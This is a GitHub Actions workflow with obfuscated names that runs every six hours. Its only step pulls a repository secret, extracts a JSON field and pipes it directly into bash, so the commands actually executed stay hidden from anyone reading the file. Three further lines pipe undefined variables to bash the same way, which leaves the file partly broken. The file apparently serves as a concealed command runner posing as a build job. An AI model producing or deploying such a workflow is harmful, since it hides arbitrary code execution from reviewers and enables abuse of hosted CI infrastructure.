name: mifadong6418
on:
  workflow_dispatch:
  schedule:
    - cron: '23 2/6 * * *'
jobs:  # 22719
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mifadong6418
        env:
          l087: ${{ secrets.l087 }}
        run: |
          echo $l087 | jq -r .v627 | /bin/bash
          echo $t1 | jq -r .wdhtw53 | /bin/bash
          echo $f94 | jq -r .wcv194 | /bin/bash
          echo $fe5392 | jq -r .c1376 | /bin/bash

